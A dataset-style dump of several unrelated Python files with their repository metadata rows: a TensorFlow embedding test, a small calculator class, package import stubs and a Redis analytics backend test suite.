self.assertTrue(de.get_model_mode() == "inference")
de.enable_train_mode()
self.assertTrue(de.get_model_mode() == "train")
for fn, assign_num, read_num in [(de.enable_train_mode, 1, 2),
(de.enable_inference_mode, 0, 1)]:
fn()
embeddings = de.get_variable('ModeModeTest' + str(assign_num),
key_dtype=dtypes.int64,
value_dtype=dtypes.float32,
devices=_get_devices(),
initializer=1.,
dim=8)
ids = constant_op.constant([0, 1, 2, 3, 4], dtype=dtypes.int64)
test_var, trainable = de.embedding_lookup([embeddings],
ids,
return_trainable=True)
_ = math_ops.add(test_var, 1)
op_list = ops.get_default_graph().get_operations()
op_list_assign = [
op.name for op in op_list if "AssignBeforeReadVariable" in op.name
]
op_list_read = [op.name for op in op_list if "ReadVariableOp" in op.name]
self.assertTrue(len(op_list_assign) == assign_num)
self.assertTrue(len(op_list_read) == read_num)
de.enable_train_mode()
ops.reset_default_graph()
def test_inference_numberic_correctness(self):
train_pred = None
infer_pred = None
dim = 8
initializer = init_ops.random_normal_initializer(0.0, 0.001)
raw_init_vals = np.random.rand(100, dim)
for fn in [de.enable_train_mode, de.enable_inference_mode]:
with ops.Graph().as_default():
fn()
init_ids = constant_op.constant(list(range(100)), dtype=dtypes.int64)
init_vals = constant_op.constant(raw_init_vals, dtype=dtypes.float32)
with variable_scope.variable_scope("modelmode",
reuse=variable_scope.AUTO_REUSE):
embeddings = de.get_variable('ModelModeTest-numberic',
key_dtype=dtypes.int64,
value_dtype=dtypes.float32,
devices=_get_devices() * 2,
initializer=initializer,
dim=dim)
w = variables.Variable(1.0, name="w")
_ = training_util.create_global_step()
init_op = embeddings.upsert(init_ids, init_vals)
ids = constant_op.constant([0, 1, 2, 3, 4], dtype=dtypes.int64)
test_var, trainable = de.embedding_lookup([embeddings],
ids,
return_trainable=True)
pred = math_ops.add(test_var, 1) * w
loss = pred * pred
opt = de.DynamicEmbeddingOptimizer(adagrad.AdagradOptimizer(0.1))
opt.minimize(loss)
with monitored_session.MonitoredTrainingSession(
is_chief=True, config=default_config) as sess:
if de.get_model_mode() == de.ModelMode.TRAIN:
sess.run(init_op)
train_pred = sess.run(pred)
elif de.get_model_mode() == de.ModelMode.INFERENCE:
sess.run(init_op)
infer_pred = sess.run(pred)
de.enable_train_mode()
ops.reset_default_graph()
self.assertAllEqual(train_pred, infer_pred)
if __name__ == "__main__":
test.main()
| 34.596603 | 80 | 0.583083 | 5,748 | 48,885 | 4.670494 | 0.066458 | 0.027118 | 0.021307 | 0.02086 | 0.834277 | 0.781904 | 0.743686 | 0.718394 | 0.676227 | 0.657416 | 0 | 0.025299 | 0.316743 | 48,885 | 1,412 | 81 | 34.621105 | 0.77845 | 0.036023 | 0 | 0.711588 | 0 | 0 | 0.017588 | 0.005083 | 0 | 0 | 0 | 0 | 0.030043 | 1 | 0.052361 | false | 0 | 0.03176 | 0.00515 | 0.115021 | 0.000858 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6b1f38d53c450be0c931a982e494dd906be85b0e | 577 | py | Python | Python/app.python/aula7/aula7b.py | jacksontenorio8/python | a484f019960faa5aa29177eff44a1bb1e3f3b9d0 | [
"MIT"
] | null | null | null | Python/app.python/aula7/aula7b.py | jacksontenorio8/python | a484f019960faa5aa29177eff44a1bb1e3f3b9d0 | [
"MIT"
] | null | null | null | Python/app.python/aula7/aula7b.py | jacksontenorio8/python | a484f019960faa5aa29177eff44a1bb1e3f3b9d0 | [
"MIT"
] | null | null | null | class Calculadora:
def __init__(self):
pass#init não pode estar vazio por isso foi digitado pass
def soma(self, valorA, valorB):
return valorA + valorB
def subtracao(self, valorA, valorB):
return valorA - valorB
def multiplicacao(self, valorA, valorB):
return valorA * valorB
def divisao(self, valorA, valorB):
return valorA / valorB
calculadora = Calculadora()
print(calculadora.soma(10, 2))
print(calculadora.subtracao(5, 3))
print(calculadora.multiplicacao(10, 5))
print(calculadora.divisao(100, 2)) | 25.086957 | 65 | 0.67591 | 70 | 577 | 5.514286 | 0.385714 | 0.248705 | 0.165803 | 0.227979 | 0.375648 | 0.375648 | 0.287565 | 0 | 0 | 0 | 0 | 0.026906 | 0.227036 | 577 | 23 | 66 | 25.086957 | 0.838565 | 0.090121 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3125 | false | 0.0625 | 0 | 0.25 | 0.625 | 0.25 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 6 |
86b25519b22d043d3759460f67647681d79fc45a | 59 | py | Python | stable_baselines_custom/trpo_mpi/__init__.py | iamlab-cmu/stable-baselines | 6e9a8b2ad1d690bd9a9611405e4f319a52101540 | [
"MIT"
] | null | null | null | stable_baselines_custom/trpo_mpi/__init__.py | iamlab-cmu/stable-baselines | 6e9a8b2ad1d690bd9a9611405e4f319a52101540 | [
"MIT"
] | null | null | null | stable_baselines_custom/trpo_mpi/__init__.py | iamlab-cmu/stable-baselines | 6e9a8b2ad1d690bd9a9611405e4f319a52101540 | [
"MIT"
] | null | null | null | from stable_baselines_custom.trpo_mpi.trpo_mpi import TRPO
| 29.5 | 58 | 0.898305 | 10 | 59 | 4.9 | 0.7 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067797 | 59 | 1 | 59 | 59 | 0.890909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
86badb8746003659c2c8d486ff968ef1066efb2d | 908 | py | Python | src/transformers/utils/dummy_timm_and_vision_objects.py | bhavika/transformers | 65cf33e7e53cd46313f3655f274b3f6ca0fd679d | [
"Apache-2.0"
] | 31 | 2022-02-02T13:13:41.000Z | 2022-03-29T08:37:20.000Z | src/transformers/utils/dummy_timm_and_vision_objects.py | bhavika/transformers | 65cf33e7e53cd46313f3655f274b3f6ca0fd679d | [
"Apache-2.0"
] | 2 | 2022-03-14T10:13:16.000Z | 2022-03-14T11:50:27.000Z | src/transformers/utils/dummy_timm_and_vision_objects.py | bhavika/transformers | 65cf33e7e53cd46313f3655f274b3f6ca0fd679d | [
"Apache-2.0"
] | 2 | 2022-03-21T04:32:39.000Z | 2022-03-22T01:02:49.000Z | # This file is autogenerated by the command `make fix-copies`, do not edit.
# flake8: noqa
from ..file_utils import DummyObject, requires_backends
DETR_PRETRAINED_MODEL_ARCHIVE_LIST = None
class DetrForObjectDetection(metaclass=DummyObject):
_backends = ["timm", "vision"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["timm", "vision"])
class DetrForSegmentation(metaclass=DummyObject):
_backends = ["timm", "vision"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["timm", "vision"])
class DetrModel(metaclass=DummyObject):
_backends = ["timm", "vision"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["timm", "vision"])
class DetrPreTrainedModel(metaclass=DummyObject):
_backends = ["timm", "vision"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["timm", "vision"])
| 25.942857 | 75 | 0.685022 | 96 | 908 | 6.166667 | 0.416667 | 0.135135 | 0.189189 | 0.216216 | 0.626689 | 0.626689 | 0.626689 | 0.626689 | 0.626689 | 0.626689 | 0 | 0.001326 | 0.169604 | 908 | 34 | 76 | 26.705882 | 0.78382 | 0.094714 | 0 | 0.666667 | 1 | 0 | 0.09768 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.055556 | 0 | 0.722222 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
86c0ef216a6e479bea7864317e5c3e1c5dba520b | 493 | py | Python | kivent/modules/core/kivent_core/systems/__init__.py | WeilerWebServices/Kivy | 54e3438156eb0c853790fd3cecc593f09123f892 | [
"MIT"
] | null | null | null | kivent/modules/core/kivent_core/systems/__init__.py | WeilerWebServices/Kivy | 54e3438156eb0c853790fd3cecc593f09123f892 | [
"MIT"
] | null | null | null | kivent/modules/core/kivent_core/systems/__init__.py | WeilerWebServices/Kivy | 54e3438156eb0c853790fd3cecc593f09123f892 | [
"MIT"
] | null | null | null | from kivent_core.systems import gamesystem
from kivent_core.systems import staticmemgamesystem
from kivent_core.systems import scale_systems
from kivent_core.systems import gameview
from kivent_core.systems import rotate_systems
from kivent_core.systems import color_systems
from kivent_core.systems import position_systems
from kivent_core.systems import gamemap
from kivent_core.systems import renderers
from kivent_core.systems import lifespan
from kivent_core.systems import animation_sys
| 41.083333 | 51 | 0.888438 | 71 | 493 | 5.943662 | 0.239437 | 0.260664 | 0.364929 | 0.547393 | 0.770142 | 0.322275 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089249 | 493 | 11 | 52 | 44.818182 | 0.939866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
86fadf904682c411413ad9488be6cd7200f1ac99 | 50,386 | py | Python | tests/analytics/backends/redis_test.py | educreations/py-analytics | abbc814925c6cc200b3329c7de9f1868e1cb8c01 | [
"Apache-2.0"
] | 10 | 2015-01-25T20:29:55.000Z | 2020-12-08T21:35:09.000Z | tests/analytics/backends/redis_test.py | educreations/py-analytics | abbc814925c6cc200b3329c7de9f1868e1cb8c01 | [
"Apache-2.0"
] | 3 | 2018-05-15T06:28:20.000Z | 2021-03-30T17:47:45.000Z | tests/analytics/backends/redis_test.py | educreations/py-analytics | abbc814925c6cc200b3329c7de9f1868e1cb8c01 | [
"Apache-2.0"
] | 6 | 2017-07-03T16:28:29.000Z | 2020-06-15T19:10:45.000Z | from __future__ import absolute_import
from nose.tools import ok_, eq_, raises, set_trace
from analytics import create_analytic_backend
import datetime
import itertools
class TestRedisAnalyticsBackend(object):
def setUp(self):
self._backend = create_analytic_backend({
"backend": "analytics.backends.redis.Redis",
"settings": {
"hosts": [{"db": 3}, {"db": 4}, {"db": 5}]
},
})
self._redis_backend = self._backend.get_backend()
#clear the redis database so we are in a consistent state
self._redis_backend.flushdb()
def tearDown(self):
self._redis_backend.flushdb()
def test_track_metric(self):
user_id = 1234
metric = "badge:25"
datetime_obj = datetime.datetime(year=2012, month=1, day=1)
ok_(self._backend.track_metric(user_id, metric, datetime_obj))
keys = self._redis_backend.keys()
#flatten list to lists incase we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
keys.sort()
eq_(len(keys), 3)
daily = self._redis_backend.hgetall(keys[2])
weekly = self._redis_backend.hgetall(keys[1])
aggregated = self._redis_backend.get(self._backend._prefix + ":" + "analy:%s:count:%s" % (user_id, metric, ))
#each metric should be at 1
[eq_(int(value), 1) for value in daily.values()]
[eq_(int(value), 1) for value in weekly.values()]
eq_(int(aggregated), 1)
#each hash should only have one key
eq_(len(daily.keys()), 1)
eq_(len(weekly.keys()), 2)
#try incrementing by the non default value
ok_(self._backend.track_metric(user_id, metric, datetime_obj, inc_amt=3))
keys = self._redis_backend.keys()
#flatten list to lists incase we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
keys.sort()
eq_(len(keys), 3)
daily = self._redis_backend.hgetall(keys[2])
weekly = self._redis_backend.hgetall(keys[1])
aggregated = self._redis_backend.get(self._backend._prefix + ":" + "analy:%s:count:%s" % (user_id, metric, ))
#each metric should be at 4
[eq_(int(value), 4) for value in daily.values()]
[eq_(int(value), 4) for value in weekly.values()]
eq_(int(aggregated), 4)
def test_track_count(self):
user_id = 1234
metric = "badge:25"
ok_(self._backend.track_count(user_id, metric))
keys = self._redis_backend.keys()
#flatten list to lists incase we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
eq_(len(keys), 1)
aggregated = self._redis_backend.get(self._backend._prefix + ":" + "analy:%s:count:%s" % (user_id, metric, ))
#count should be at 1
eq_(int(aggregated), 1)
#try incrementing by the non default value
ok_(self._backend.track_count(user_id, metric, inc_amt=3))
keys = self._redis_backend.keys()
#flatten list to lists incase we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
eq_(len(keys), 1)
aggregated = self._redis_backend.get(self._backend._prefix + ":" + "analy:%s:count:%s" % (user_id, metric, ))
#count should be at 4
eq_(int(aggregated), 4)
def test_get_count(self):
user_id = 1234
metric = "badge:25"
ok_(self._backend.track_count(user_id, metric))
keys = self._redis_backend.keys()
#flatten list to lists incase we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
eq_(len(keys), 1)
count = self._backend.get_count(user_id, metric)
#count should be at 1
eq_(count, 1)
#try incrementing by the non default value
ok_(self._backend.track_count(user_id, metric, inc_amt=3))
keys = self._redis_backend.keys()
#flatten list to lists incase we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
eq_(len(keys), 1)
count = self._backend.get_count(user_id, metric)
#count should be at 4
eq_(count, 4)
def test_get_count_invalid_key(self):
user_id = 1234
metric = "badge:25"
keys = self._redis_backend.keys()
#flatten list to lists incase we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
eq_(len(keys), 0)
count = self._backend.get_count(user_id, metric)
#count should be at 0
eq_(count, 0)
def test_get_counts(self):
user_id = 1234
metric = "badge:25"
metric2 = "badge:26"
does_not_exist = "key:does:not:exist"
ok_(self._backend.track_count(user_id, metric))
keys = self._redis_backend.keys()
#flatten list to lists incase we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
eq_(len(keys), 1)
#try incrementing by the non default value
ok_(self._backend.track_count(user_id, metric2, inc_amt=3))
keys = self._redis_backend.keys()
#flatten list to lists incase we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
eq_(len(keys), 2)
counts = self._backend.get_counts([(user_id, metric,), (user_id, metric2,), (user_id, does_not_exist,)])
#check the counts for each of the metrics
eq_(len(counts), 3)
eq_(counts[0], 1)
eq_(counts[1], 3)
eq_(counts[2], 0)
def test_get_counts_with_time_period(self):
start_date = datetime.date(year=2012, month=4, day=6)
end_date = datetime.date(year=2012, month=4, day=11)
user_id = "user1234"
metric = "badges:21"
metric2 = "badge:22"
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2012, month=4, day=11), inc_amt=2))
counts = self._backend.get_counts([(user_id, metric,), (user_id, metric2,)], start_date=start_date, end_date=end_date)
#check the counts for each of the metrics
eq_(len(counts), 2)
eq_(counts[0], 4)
eq_(counts[1], 2)
def test_clear_all(self):
user_id = 1234
metric = "badge:25"
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=5, day=11), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=6, day=18), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=30)))
redis_client = self._backend.get_backend()
#keys not matching the prefix should not be deleted
redis_client.set("foo", "bar")
ok_(not len(list(itertools.chain(*redis_client.keys()))) == 0)
self._backend.clear_all()
ok_(len(list(itertools.chain(*redis_client.keys()))) == 1)
def test_get_closest_week(self):
"""
Gets the closest Monday to the provided date.
"""
date_april_1 = datetime.date(year=2012, month=4, day=1)
date_april_2 = datetime.date(year=2012, month=4, day=2)
date_april_7 = datetime.date(year=2012, month=4, day=7)
date_april_8 = datetime.date(year=2012, month=4, day=8)
date_april_9 = datetime.date(year=2012, month=4, day=9)
monday_march_26 = datetime.date(year=2012, month=3, day=26)
monday_april_2 = datetime.date(year=2012, month=4, day=2)
monday_april_9 = datetime.date(year=2012, month=4, day=9)
eq_(self._backend._get_closest_week(date_april_1), monday_march_26)
eq_(self._backend._get_closest_week(date_april_2), monday_april_2)
eq_(self._backend._get_closest_week(date_april_7), monday_april_2)
eq_(self._backend._get_closest_week(date_april_8), monday_april_2)
eq_(self._backend._get_closest_week(date_april_9), monday_april_9)
def test_metric_by_month_over_several_months(self):
user_id = 1234
metric = "badge:25"
from_date = datetime.date(year=2012, month=4, day=2)
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=5, day=11), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=6, day=18), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=30)))
series, values = self._backend.get_metric_by_month(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-01"], 7)
eq_(values["2012-05-01"], 2)
eq_(values["2012-06-01"], 3)
eq_(values["2012-07-01"], 0)
eq_(values["2012-08-01"], 0)
def test_metric_by_month_over_several_months_crossing_year_boundry(self):
user_id = 1234
metric = "badge:25"
from_date = datetime.date(year=2011, month=12, day=1)
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=8), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=30), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=1, day=1), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=1, day=5), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7)))
series, values = self._backend.get_metric_by_month(user_id, metric, from_date, limit=6)
eq_(len(series), 6)
eq_(values["2011-12-01"], 6)
eq_(values["2012-01-01"], 5)
eq_(values["2012-02-01"], 0)
eq_(values["2012-03-01"], 0)
eq_(values["2012-04-01"], 1)
eq_(values["2012-05-01"], 0)
def test_metric_by_week_over_several_weeks(self):
user_id = 1234
metric = "badge:25"
from_date = datetime.date(year=2012, month=4, day=2)
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=11), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=18), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=30)))
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
def test_metric_by_week_over_several_weeks_crossing_year_boundry(self):
user_id = 1234
metric = "badge:25"
from_date = datetime.date(year=2011, month=12, day=1)
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=8), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=30), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=1, day=1), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=1, day=5), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7)))
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=6)
eq_(len(series), 6)
eq_(values["2011-11-28"], 0)
eq_(values["2011-12-05"], 4)
eq_(values["2011-12-12"], 0)
eq_(values["2011-12-19"], 0)
eq_(values["2011-12-26"], 4)
eq_(values["2012-01-02"], 3)
def test_get_weekly_date_range(self):
date = datetime.date(year=2011, month=11, day=1)
result = self._backend._get_weekly_date_range(date, datetime.timedelta(weeks=12))
eq_(len(result), 2)
eq_(result[0], datetime.date(year=2011, month=11, day=1))
eq_(result[1], datetime.date(year=2012, month=1, day=1))
def test_get_daily_date_range(self):
date = datetime.date(year=2011, month=11, day=15)
result = self._backend._get_daily_date_range(date, datetime.timedelta(days=30))
eq_(len(result), 2)
eq_(result[0], datetime.date(year=2011, month=11, day=15))
eq_(result[1], datetime.date(year=2011, month=12, day=1))
def test_get_daily_date_range_spans_month_and_year(self):
date = datetime.date(year=2011, month=11, day=15)
result = self._backend._get_daily_date_range(date, datetime.timedelta(days=65))
eq_(len(result), 3)
eq_(result[0], datetime.date(year=2011, month=11, day=15))
eq_(result[1], datetime.date(year=2011, month=12, day=1))
eq_(result[2], datetime.date(year=2012, month=1, day=1))
def test_metric_by_day(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = "user1234"
metric = "badges:21"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=30), inc_amt=5))
series, values = self._backend.get_metric_by_day(user_id, metric, date, 30)
eq_(len(series), 30)
eq_(len(values.keys()), 30)
eq_(values["2011-12-05"], 2)
eq_(values["2011-12-08"], 3)
eq_(values["2011-12-30"], 5)
def test_metric_by_count_start_end_date(self):
start_date = datetime.date(year=2011, month=9, day=1)
end_date = datetime.date(year=2011, month=11, day=1)
user_id = "user1234"
metric = "badges:21"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=5, day=30), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=7, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=8, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=9, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=10, day=1), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=11, day=5), inc_amt=2))
count = self._backend.get_count(user_id, metric, start_date=start_date, end_date=end_date)
eq_(count, 8)
def test_parse_and_process_metrics(self):
series = [datetime.datetime(year=2011, month=5, day=30), datetime.datetime(year=2011, month=7, day=8), datetime.datetime(year=2011, month=8, day=5),
datetime.datetime(year=2011, month=9, day=8), datetime.datetime(year=2011, month=9, day=8), datetime.datetime(year=2011, month=10, day=1)]
metrics = [[None, None, None, None, None, None]]
new_series, new_metrics = self._backend._parse_and_process_metrics(series, metrics)
eq_(set(['2011-10-01', '2011-07-08', '2011-09-08', '2011-08-05', '2011-05-30']), new_series)
eq_({'2011-10-01': 0, '2011-07-08': 0, '2011-09-08': 0, '2011-08-05': 0, '2011-05-30': 0}, new_metrics)
def test_metric_by_count_start_end_date_within_a_month(self):
start_date = datetime.date(year=2011, month=9, day=1)
end_date = datetime.date(year=2011, month=9, day=15)
user_id = "user1234"
metric = "badges:21"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=5, day=30), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=7, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=8, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=9, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=10, day=1), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=11, day=5), inc_amt=2))
count = self._backend.get_count(user_id, metric, start_date=start_date, end_date=end_date)
eq_(count, 3)
def test_metric_by_count_start_end_date_with_metric_on_end_date(self):
start_date = datetime.date(year=2011, month=9, day=1)
end_date = datetime.date(year=2011, month=9, day=8)
user_id = "user1234"
metric = "badges:21"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=5, day=30), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=7, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=8, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=9, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=10, day=1), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=11, day=5), inc_amt=2))
count = self._backend.get_count(user_id, metric, start_date=start_date, end_date=end_date)
eq_(count, 3)
def test_metric_by_count_start_end_date_with_metric_on_start_date(self):
start_date = datetime.date(year=2011, month=9, day=8)
end_date = datetime.date(year=2011, month=9, day=15)
user_id = "user1234"
metric = "badges:21"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=5, day=30), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=7, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=8, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=9, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=10, day=1), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=11, day=5), inc_amt=2))
count = self._backend.get_count(user_id, metric, start_date=start_date, end_date=end_date)
eq_(count, 3)
@raises(Exception)
def test_get_metrics_invalid_args(self):
date = datetime.date(year=2011, month=12, day=1)
self._backend.get_metrics([], date, group_by="leapyear")
def test_get_count_in_time_period(self):
start_date = datetime.date(year=2012, month=4, day=5)
end_date = datetime.date(year=2012, month=4, day=9)
user_id = "user1234"
metric = "badges:21"
metric2 = "badge:22"
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2012, month=4, day=11), inc_amt=2))
count = self._backend.get_count(user_id, metric, start_date=start_date, end_date=end_date)
eq_(6, count)
def test_get_metrics_by_day(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = "user1234"
metric = "badges:21"
metric2 = "badge:22"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=30), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2011, month=12, day=5), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2011, month=12, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2011, month=12, day=30), inc_amt=5))
results = self._backend.get_metrics([(user_id, metric,), (user_id, metric2,)], date, limit=30, group_by="day")
#metric
eq_(len(results[0][0]), 30)
eq_(len(results[0][1].keys()), 30)
eq_(results[0][1]["2011-12-05"], 2)
eq_(results[0][1]["2011-12-08"], 3)
eq_(results[0][1]["2011-12-30"], 5)
#metric 2
eq_(len(results[1][0]), 30)
eq_(len(results[1][1].keys()), 30)
eq_(results[1][1]["2011-12-05"], 3)
eq_(results[1][1]["2011-12-08"], 3)
eq_(results[1][1]["2011-12-30"], 5)
